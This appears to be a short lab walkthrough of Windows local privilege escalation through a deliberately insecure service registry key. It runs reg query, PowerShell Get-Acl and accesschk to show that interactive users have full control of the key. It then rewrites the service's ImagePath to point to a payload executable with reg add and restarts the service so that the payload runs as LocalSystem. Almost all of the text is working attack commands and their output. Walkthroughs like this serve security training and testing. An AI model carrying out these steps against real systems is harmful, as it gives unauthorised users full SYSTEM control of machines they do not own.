Reading Time: < 1 minute
  1. reg query HKLM\SYSTEM\CurrentControlSet\Services\regsvc

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\regsvc
Type REG_DWORD 0x10
Start REG_DWORD 0x3
ErrorControl REG_DWORD 0x1
ImagePath REG_EXPAND_SZ “C:\Program Files\Insecure Registry Service\insecureregistryservice.exe”
DisplayName REG_SZ Insecure Registry Service
ObjectName REG_SZ LocalSystem

get ACL on registry via powershell

2a) powershell -exec bypass -c “Get-Acl HKLM:\SYSTEM\CurrentControlSet\Services\regsvc | Format-List”

ath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\regsvc
Owner : BUILTIN\Administrators
Group : NT AUTHORITY\SYSTEM
Access : Everyone Allow ReadKey
NT AUTHORITY\INTERACTIVE Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
Audit :
Sddl : O:BAG:SYD:P(A;CI;KR;;;WD)(A;CI;KA;;;IU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)

or via AccessCheck sysinternals

2b) accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

HKLM\System\CurrentControlSet\Services\regsvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
KEY_ALL_ACCESS
RW BUILTIN\Administrators
KEY_ALL_ACCESS
RW NT AUTHORITY\INTERACTIVE
KEY_ALL_ACCESS

and the last check if service can be restarted

3) accesschk.exe /accepteula -ucqv regsvc

regsvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM

SERVICE_START
SERVICE_STOP

Change ImagePath to the payload

4) reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Temp\payload.exe /f

and restart the service

net stop regsvc

net start regsvc

0